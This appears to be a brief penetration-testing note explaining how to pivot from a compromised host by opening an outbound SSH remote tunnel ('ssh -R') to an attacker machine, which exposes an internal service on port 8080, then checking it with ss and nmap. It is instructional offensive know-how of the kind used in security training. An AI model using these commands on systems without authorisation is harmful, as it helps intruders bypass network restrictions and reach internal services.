In case , we have shell to 172.65.0.5 but inbound ssh service is prohibited than we can tunnel by outbound ssh on attacker machine(172.80.0.1) to any vulnerable service on target like 192.162.1.2 on port 8080
- Enable ssh on attacker machine
systemctl start ssh
- On compromised machine, here R is for remote
ssh -R <attacker-local-port>:<target-ip>:<target-port> <user>@<attacker-ip> -fN
ssh -R 8000:192.162.1.2:8080 [email protected] -fN
- To check if tunnelling is successful. On attacker machine
ss -antp | grep "8080”
sudo nmap -sS -sV 127.0.0.1 -p 8080